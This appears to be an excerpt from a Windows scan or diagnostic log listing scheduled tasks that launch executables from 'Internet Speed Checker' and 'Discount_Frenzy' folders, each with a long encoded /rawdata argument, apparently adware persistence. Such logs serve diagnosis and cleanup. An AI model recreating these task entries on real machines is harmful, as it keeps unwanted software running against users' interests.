C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-10_user.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-10.exe /rawdata=U7BaE8gr5KlUqhcIsB30N82Z/YTzsJJACcCZtp3Ct+/m6mktQ3lKaghbt3pdWM8W8ApIbBUFstq6v/9l78GxnNCqs/KHii1Uerep3Aq07r+2Y2byxFiQAKPCwFlfSe6qQl+9R0rXwljAdR9CGub89Q9EvpOwvcEfzFLEqUsAMHcPnkEa3gIbKIyDb/ZGQAn3HZYHxtfmfcYgE2bNlDg7uiKaVYdZN9L3RGQifNJUaescBSI70xoZWCJokJcXasMmrZIvoTU0KFhhOO3hYqqgv2cKk9zS2V6qU3ixfOdvf9BEXadhvHk7z1Fc5B8P1/srysg5fadUfv/BUjCrV+htjIC0UKLBK6XvvpHZETAiWEoZp0oVznudwD2d49v+GL/yHqrXarwV1/LhVR553frer598lGQbqfLrQBNoJvQslSvDGh0kJu/hjiFwwb82d96WUmCthHP3jFprdrCL/vBpJRCWrI6GAoQpJHKKG8XBCoPxP/AFbeiK1WnUQboD0LLlbrlmG6vOUC2xNckyyajDzDaDP6TaCHGMBpecTfqxLhsyCbiXd0D+icxvUoEP/3vlQNomelQBFcTWU7lkVcEdHy5dtvb+G8mWnN+2JN/pJH/hnuTZUaSLDyFYCaz88U1KBtxqH+qfWcTaSJD0C9hN6iviY1zoeD/cXKJBHedv5FtDsTOoqBV1GVSQZx7KLRoh3Df0RvJoE59AWXjpq9awTwf6YGqgx8YEnlwM8albRHy3U52dkeeiXlxlJaSEdqie1LKg3CwCHqKbamI67rGOH4/MDS7LMjXqi7PaTHxYtz7wAGqgaf/Nj9XjIfpFtwL3q6t3Hf7nNyCUq75m62Hcag==
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-4.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-4.exe /rawdata=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
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-5.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-5.exe /rawdata=NuW8sVmBvnKfcO4roN6rAZc1+1gNheyBM1kgvr+vCvOUmZJyHdGvFnSSqnmJlIHYVq43AZH6OFrW6T3VP6pUzMWSSRKWrORNgoHXhqKe9QFAbr2FjhoAtn+MnvUpOMacQggjrZ2d8AohropYSxhrfhi1y5SIRqVvAAUSaLAZSqSfyOKCavPXgEZDm8vfL2zVm81wdU702Rm2/jdX3Xlgy6ilGDU776elK8zMv2CSDMyPDWMPXfWy5jh+GUlzPQXyvAH9fKE1oP/5j01BqFurgEk44t2LLGgHfle38qUOGUY804r1QjbEi9ywjJfH4Nw7FCcBZ+9P/641Sj93Hg+2TVOTB1B2cPVwErBWtj44YFDX/EpgLAKu6oAiieBI06M5opN3lfsT2RWYTxagwa2i48rFkP9cV5R99NyUG9rgStxKxEPEgiq2PUQXZsD3a5aHwtWbIsYTY6pJ69uM0/BQxUIySCWXdpSSwpzbU+74CYmMKYOBVfPgabEov+ee1drZs2+sNTrZwr3tAXRu5JRbPH3eR92z+uH2ZsLblLP/KOZvThnY10nHzV2b9VMA+eniZTcFHuBZy5pj/bWquhBaNV/PQoart1J3tWLQO6WnVjpFwHW8zM8Y7Mr0rXzhEZb/dwMVPFiFtf2MUc3fR8ndgtT2+r5iSvDMtA/qCC7A0BF8xfSPYZ+SDRU8yuK5/C933svrbj9n9RG53g4JEpObaNGUhF6b8fx35M6vTUP4duXCeQcFlMyWJ9gVmlyHtip0xynDBrrYZN/UPOIKUmrc8TyauvdTaafwPrVb54j6wxedMq2x4I7EbOiklPKFRmtamnPpkbHG4PoxOSPydKoBhxZLkQRVHNH/rAt/5ie/jTtlZ1xvsU0Zr1fD4cgIlFt6cRzy9xAZOllvGkSdscmrJPB4Fc2NYFUtOYdQcY1IGYjuvs0UX6rBV9gQ3rzW8JiYacb0YBj8v1i1lfObfBHcttrCi94d00KpJ21F5F6I0WY9ccx67vBafmakgGdVlIso
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-5_user.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-5.exe /rawdata=NuW8sVmBvnKfcO4roN6rAZc1+1gNheyBM1kgvr+vCvOUmZJyHdGvFnSSqnmJlIHYVq43AZH6OFrW6T3VP6pUzMWSSRKWrORNgoHXhqKe9QFAbr2FjhoAtn+MnvUpOMacQggjrZ2d8AohropYSxhrfhi1y5SIRqVvAAUSaLAZSqSfyOKCavPXgEZDm8vfL2zVm81wdU702Rm2/jdX3Xlgy6ilGDU776elK8zMv2CSDMyPDWMPXfWy5jh+GUlzPQXyvAH9fKE1oP/5j01BqFurgEk44t2LLGgHfle38qUOGUY804r1QjbEi9ywjJfH4Nw7FCcBZ+9P/641Sj93Hg+2TVOTB1B2cPVwErBWtj44YFDX/EpgLAKu6oAiieBI06M5opN3lfsT2RWYTxagwa2i48rFkP9cV5R99NyUG9rgStxKxEPEgiq2PUQXZsD3a5aHwtWbIsYTY6pJ69uM0/BQxUIySCWXdpSSwpzbU+74CYmMKYOBVfPgabEov+ee1drZs2+sNTrZwr3tAXRu5JRbPH3eR92z+uH2ZsLblLP/KOZvThnY10nHzV2b9VMA+eniZTcFHuBZy5pj/bWquhBaNV/PQoart1J3tWLQO6WnVjpFwHW8zM8Y7Mr0rXzhEZb/dwMVPFiFtf2MUc3fR8ndgtT2+r5iSvDMtA/qCC7A0BF8xfSPYZ+SDRU8yuK5/C933svrbj9n9RG53g4JEpObaNGUhF6b8fx35M6vTUP4duXCeQcFlMyWJ9gVmlyHtip0xynDBrrYZN/UPOIKUmrc8TyauvdTaafwPrVb54j6wxedMq2x4I7EbOiklPKFRmtamnPpkbHG4PoxOSPydKoBh34ZtCdVD3R35jUWNTOoRYmrv76BOq023fFctGGjwmHkQta3BiTgT5yTJ4XiEkK0SWKltcEkouEMuVoLcHxaQ5EyZlOGdSYYwkc8oyeFhULW2qEAiO7XTXZVulbFw58kvQAiAD6vyYZ/91K7UTD2w0e8fW07+xCnZVNBw28WTinu
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-6.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-6.exe /rawdata=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
C:\Windows\tasks\c1cd1309-a534-4e58-8dc8-77c454728f30-7.job - C:\Program Files (x86)\Internet Speed Checker\c1cd1309-a534-4e58-8dc8-77c454728f30-7.exe /rawdata=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
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-1-6.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-1-6.exe /rawdata=h7kMzfVRpxte3fd2Uwv6sMx9ocJW38ueppIFp2wnn+mhMdSg0CmhUuc23bLWuuzAZCTFEhj/mtLahkQ/G9bMb9iNxAFrJk+MfBTpC5ZqWbnFlYlvaCckfeXt8lnkOSZGHcXNEd+faA7EsPrkb1UHhTELw2cL0qJdXOc92Xv7GFuskwQhsKbw6AU3wPfrt+56s2qafm+/CMn/aK+iIgbOF8YEc2nMChFlT1aUAuTtaezCZigQdPGT2EEZzy2MGl24zezS1GfuYqfRFRjB+lp9zmbVn8WESBUJQe5BdgEPurB32q1Vs7IoCAk7nUdMKGcnP4BlQZAxN8T6OFUuGSUZN0YcXAq8igIKMuVsFt+N3PGtLd3CfEgCu8CF7W4OVYz3gJZzFUICQkWw04qW64Y44NS/DMw6GndkoCfvBBnwSIguAyVo3ZkV9rU1TfeQvUZ5rbfGDc7vwNcznR+xb4Q3q3UAxydla2o5M8J5a1f02YYE4mCukYJijlMrcLMvbIAZjSVb0FdGh7mrITgp+yN4uLP5sifjzaIdREjzmz3JmIX0ApokV3B6CLFo3yoNixXpFjWmwyshPaddn+CIeWvpaNs9C/qdMa4cSyxe0RdX9BpUNXqwXVlXlNgNSQTA66EL8/TKStxnqF8MR3YbZfOCmUKBpu4ic6t5bhkwnGz1GaizD/I7EAqeB61eDankHtx2eMN08XulIkwFCARm1nJaJBi2wTimwfqi1OTY06l4VdTsjHmPbKSomiIxg2r7LOAHXH3DhxZsY2j/1yFnFNA+urBdJxBpWi9bMSqwIrchIGV6h2k20Odfq4/8e7kjYE3pyVyU/PD3tLRmYf6bjWXNyDsr1K1yDYIXgrvCBXQMKF7er216iVammQhDX0GWM1yHkEioDepClzx1jt7LWIHfDqrxmGQYDp5zl6qffvHh6zNbKI+bEiAsYAZ4XBIzJxvxVs8kENttci2aHOLOltGjspo11uhLeiq3DE4HafeAfvdlTv63QW3X//WEOxs6gB3No1saDeARXAvgQ+/dOabacoTsSY94YrF7foiJEHbaXZ1CEao5t7LE9nT2bED8kiX5x8ugpjlJs6detc6UMcyxw3ZNhUxkHpDbDCE/EoG4bpe00udPiHb1MdaPe0DbUV9D5nncSsLlgMC0gXkPhTObKkAbBytJE1clbxV6LGKjguBF1t3F/gNB+ZTKrCovW/3adFGL/nZBLHy5B315JRs461IdoerNCpaAt5lp+zDzzGl6+3TpN+IxrzxXDfhgyIclBuCnZ6V6HpznrvwIGbB1O6R40APYZiV4fTlLUVFt5TW6/bLKwQsvMvT1+u2zXnmG5yS/vNSZxGbV5ixBaMABOg==
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-1-7.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-1-7.exe /rawdata=NXBbeiOr3S/jlEP8vpt9EoE0R/+UVycB9nqPRSL6tU2nCDVTk7Y9FdySoASFSKAWI3AYqpYO8P+gFlUcyb0m0R6TLI4KUNChqLYLhJwkhv1YdWAZhDIyMGCKiUF/UHLKNK/ra4WY8pFRanJ5ofln7oNC5vil8I6JBYJ+crkG64gf0dRb6IOEbaLXP82l2iyxZ81uHu4BUdwDpCYN0TTKq0khH+yB+CAHc3JbsIcypmJrpDSftQ/zB9nU+mE604EXTkkdeDBY50kYlOFfB+zc4TkxY1GY80jlkatMHxLl5WI6hqqytPXwEc7KVZX50otogsxIoz40WUStCTaa8ic+y24pNkhyMbwWjxShPFso6hPWSReee8z3Iiyi78RVbZ94pUkoakBLZrnMokV2exdVON9fkoRASHWugRCIB3hv1M7pGHyuUV3claMA2BGkZE3+fzwi4FMoQrI55tzc5qllPeT7zKGynyYJXKCALRaVqoCQo5dHr91ArtCpF+aFIl8KMlUYXOS53xa/KpI+cYKVmgdChwJnHgp7EOLXlsguPJJ6JCvtNbl/3YGLOwUjK4pcqWtFlyepCFlcO8+qRSCc1eVHQy0oDPdpNLvHmeYnmhRyLpdwCF3hJtun/E/41syYwzULSQsvRm0y/HR+U3awu8P+ePnD3cAvDjZKrilX2DmzPS51tOXi1cnHzDnQuZENNSS8npSukXPeKxZNqla7Km00AaA2CbqBzL1hPbNlyCdRKF0XvQzekG8R/DAGj0M0V9FQLoWQ8JsYZd4cJpR2Yrn1YIQtJXRthY7nxstDJujDlggsTqRf/rUHYo/NVAeUa+D/RhhG1jOM4WBGkZ/J+xudAcYpk39AVessKRR/FRGoHKUnkeqb0HLpnxk8OeJfVJWdfIAdb8afdnOwtNI5MHMOGDI+8cqe6cpYKKcsNyARbN/YSa1VWYZGOV6Al5lHuYfZGbJYSbJZhf3pYKsxWm/ZFpQWqbIsCxM75/IN0Gff33pm/hiZNEuFNcIjUtTKXx1eQpWoMCfHHSPw13xE3DxUTHbNcYCfXYiyV5mcwgvn2PFTXH1SmtHhPouN9jGp9vTHpeE+1yUKJIYwgDj79wWSwFSYx1Iyc0p6WlEfzCznxJRwoPoYMhyWcNX5LPvAKDflCTOKolJMSUFVC+iTEEENvMvHRfuvBhKxyazxdxZMlgJfpSOqDazKRLefD1FqYpCysWbyEHVJ+nc6qC16QSMx9zK0f5LTkR2uR6TighNDRbXFpCqmLBKHbDwbiy5N65pUVLfnpdE1f/vVBy8egRAC1C7yS1ys0CTL0FrjhPfplPVxuIz0Ia6setaqFj1iJKYNLOv+e7XMCbhIsIGQKJMYdkiKDsx0JSXz7OxE0zmktvcRQwR7prVSPSA/wZ1ScLh+5EVfsepUJT3tCbdF2rG0mLe2kj27dkOpMQPTqHOYQlU1Dbw09OMY+F6XL2O7Ywx+Q2XsayjHq2yVDQYZuD8FDjvUMMLAhDXAFFH19Su6gHZKyAyh4ic6h6CGsgZE
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-10_user.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-10.exe /rawdata=GLBWe5vkiCBpgEVClfcS+rEBtcjHkExQdi+K8aQFWDJonEFddYjaIv++mz93D/vesPGzUm4YDnExEQKM+3vBvXkq9UnVDCfiALhQPTlirLm/InCO3Vf83NYpTWaPgva1JVl0eLUTEyz0UPEYBv01k0intxtjS+K+0UZU3jkllL0PnkEa3gIbKIyDb/ZGQAn3HZYHxtfmfcYgE2bNlDg7uiKaVYdZN9L3RGQifNJUaescBSI70xoZWCJokJcXasMmrZIvoTU0KFhhOO3hYqqgv2cKk9zS2V6qU3ixfOdvf9BEXadhvHk7z1Fc5B8P1/srysg5fadUfv/BUjCrV+htjIBjtKf/3QzBd6MmGNvdClgaPX2SAmQkk1uPH2U7srQ3fRCkw3dKbDbvMOVAkcQOUZiJd+NUtaeLxCFLacx29Ksk5IB1T3sdf2+Xyy/Veagl80XOcr5O/uyQjJyLhnnJIZZUAdNw9FMmWwKtiWhwcigADRR742B2LyEOPQ/PfVSNbrlmG6vOUC2xNckyyajDzDaDP6TaCHGMBpecTfqxLhsyCbiXd0D+icxvUoEP/3vlQNomelQBFcTWU7lkVcEdHy5dtvb+G8mWnN+2JN/pJH/hnuTZUaSLDyFYCaz88U1KBtxqH+qfWcTaSJD0C9hN6iviY1zoeD/cXKJBHedv5FscwLpBTW3DF/J4WLGScsA8cUtsy5wjTPBWBF3q8unC8OhGc9SjpHdzJP9R4rm0QlqQ+W/zr8zWfKa5V/5gBJ6B6tLtb2DzpmpeYyPH45QTaXjD7s1DmB6iFL2ZFBdxaxtnJqOWp7Yq3i8Rd2rFtc6bIJJcD5c/SbVLpOc3B/gU+A==
C:\Windows\tasks\dbfd5db5-cf23-4227-9665-439089d099b3-4.job - C:\Program Files (x86)\Discount_Frenzy\dbfd5db5-cf23-4227-9665-439089d099b3-4.exe /rawdata=fZYOVkPeTN5LiIBtb4GR9AOOnf04xuBWuzWlFIYdVRPCQPTNbzWjBSs55FdIvtlmWrsnaH9Mv39Jsw7NGP4XHxgMMJF3/sISEAgVejHGHvXx/9QWb4SSlYowP0uKFmRaY6GBWWnJKptU9uc3KhLEGV/Gxy1YR7xpyDTdmANA/iVZogEkqx9nUyoilKPWzlsHynJjqF/EBHmUiFztJ+x8LsIAqnG8NbyCmlBxcAGBS+jBU1NywjqSumbEH7ghPDJdJh3yY0O4urdz+CQQQeOrMvsEk31EyXJHB1/GKj8AkoO9R5hsUZ7KfqZ/TWMbRUJK7+V0mNzDCDRylDYIi2twIMfmFuUTCIlgk3f5ZJvNf+I7TXNJH/FCYdJrKTuRzd+ur8JYTviw/CLRsVIlebmGZhT9Wkn6wVWdDJsxo1F7bZ9mZ1YgvSJyQbhOOy5JGcImqm73Eico+/H5+EsF/2U5EfFSxIux6DBwKldDVU9z3t8OSvmzaB1BablI6ofQJSa1NeYxnVb9bLjzVphlDJyPZAfleNa7C9Ykngqbfk9qMGFfNozecj4jSKwJS8gOyuCBIpeyWjVD55aXm9pbDYN6Zaod8IoZGZK5fLamCLGMIhDRrBNJx9bzVw/NzMUnbRgVj9+CpGlmPqimPbREXNYHQZF/OhGffYDwuzzU2fmNeFs/45hoid9CLChh6lbFOZuMCkb5uooV+Sam4354ttfhuDE0trG3XHE/JCGTgHlWseOBnCR34jl0Oa+Di/XQledlcWe8Dj7caR6FiCZDI6MAYeL5BSKHQfIcFA+3pAlROS+NJrRyfmrGWr8mhHDdG77bn3IMBPw+IAn5bG+fFm6pd7LN/08MbxnQSHe7QELpOWQhYsS7nsj4LyXDxtPXhskTnsGbvI5Ib2e1yo9Cq3StHN9HMTyHI0xQhmeen3wPrvUmQwrVBy4CweLnShD080yYSFpOmxyfqYSyvNtKA30RmKaKhNYf8eHI/pOzdmMKtvTN1